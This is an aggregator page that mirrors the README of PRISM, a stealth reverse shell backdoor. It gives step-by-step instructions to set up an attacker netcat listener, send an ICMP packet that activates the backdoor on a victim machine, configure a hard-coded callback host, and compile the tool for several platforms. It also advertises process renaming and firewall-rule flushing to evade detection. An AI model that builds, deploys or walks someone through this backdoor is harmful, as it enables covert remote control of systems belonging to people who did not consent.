Git Product home page Git Product logo

prism's Introduction

Prism backdoor

PRISM is an user space stealth reverse shell backdoor. The code is available on GitHub.

It has been fully tested on:

  • Linux
  • Solaris
  • AIX
  • BSD/Mac
  • Android

PRISM can works in two different ways: ICMP and STATIC mode.

ICMP mode

Using this operation mode the backdoor waits silently in background for a specific ICMP packet containing the host/port to connect back and a private key to prevent third party access.

  • First, run netcat on the attacker machine to wait for incoming connection from the backdoor:
$ nc -l -p 6666
  • Using the sendPacket.py script (or another packet builder) send the activation packet to the backdoor:
./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666

192.168.0.1 is the victim machine running prism backdoor
p4ssw0rd is the key
192.168.0.10 is the attacker machine address
6666 is the attacker machine port

  • The backdoor will connect back to netcat!

STATIC mode

Using this operation mode the backdoor try to connects to an hard-coded IP/PORT.
In this case, just run netcat listening on the hard-coded machine/port:

 $ nc -l -p [PORT]

Features

  • Two operating modes (ICMP and STATIC)
  • Runtime process renaming
  • No listening ports
  • Automatic iptables rules flushing
  • Written in pure C
  • No library dependencies

Get the code

git clone https://github.com/andreafabrizi/prism.git

Configuration

Before building, you have to configure the backdoor editing the source code.
Following the configuration parameters description:

STATIC mode:
REVERSE_HOST: Machine address to connect back
REVERSE_PORT: Machine port to connect back
RESPAWN_DELAY: Time, in seconds, between each connection

ICMP mode:
ICMP_KEY: Key/Password to activate the backdoor

Generic parameters:
MOTD: Message to be printed at the backdoor connection
SHELL: Shell to execute
PROCESS_NAME: Fake process name

Building

gcc <..OPTIONS..> -Wall -s -o prism prism.c

Available GCC options:
-DDETACH #Run the process in background
-DSTATIC #Enable STATIC mode (default is the ICMP mode)
-DNORENAME #Doesn't renames the process
-DIPTABLES #Try to flush all iptables rules

Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

Cross Compiling

  • Android
    Change the shell to /system/bin/sh
    apt-get install gcc-arm-linux-gnueabi
    arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism

  • Linux 64bit (using a 32bit host system)
    apt-get install libc6-dev-amd64
    gcc -DDETACH -m64 -Wall -s -o prism prism.c

  • Linux 32bit (using a 64bit host system)
    apt-get install libc6-dev-i386
    gcc -DDETACH -m32 -Wall -s -o prism prism.c

Backdoor building information

The backdoor ignore any command line parameter, except the Inf0 (the last char is a digit).
This option allow you to see some information about the backdoor:

$ ./prism Inf0
 Version: 0.5
 Mode: icmp
 Key: p455w0rD
 Process name: [udevd]
 Shell: /bin/sh
 Detach: Yes
 Flush Iptables: No

prism's People

Contributors

andreafabrizi avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.